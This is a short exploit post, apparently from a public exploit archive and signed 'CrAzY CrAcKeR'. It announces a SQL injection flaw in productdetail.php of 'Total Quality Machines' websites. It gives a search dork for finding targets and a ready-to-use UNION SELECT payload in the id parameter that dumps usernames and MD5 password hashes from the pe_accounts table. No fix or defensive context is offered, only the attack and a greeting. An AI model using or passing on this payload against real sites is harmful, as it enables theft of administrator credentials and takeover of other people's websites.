################################################################## # Title : Total Quality Machines (productdetail.php) SQL Injection Vulnerabilities # # Discovered By: CrAzY CrAcKeR # # Home : Null # # Email : CrAzY_CrAcKeR@xxxxxxxxxxxxxxx # # date : 14/4/2012 # # d0rk:- "Total Quality Machines" # ################################################################## ################################################################## # # +-+-+-+-+-+-+-+-+-+-+ # --+CrAzY CrAcKeR+-- # +-+-+-+-+-+-+-+-+-+-+ # # ################################################################## ################################################################## # Example:- # # [-] http://www.???.com/productdetail.php?id=(sql) # # [-] Injection code.... ( -1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password)+from+pe_accounts ) # # [-] http://www.???.com/productdetail.php?id=--1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password)+from+pe_accounts # # [-] you see now password (md5) and the name of the site manager #################################################################### # Greeting to my friend A7eb Alwrd ####################################################################
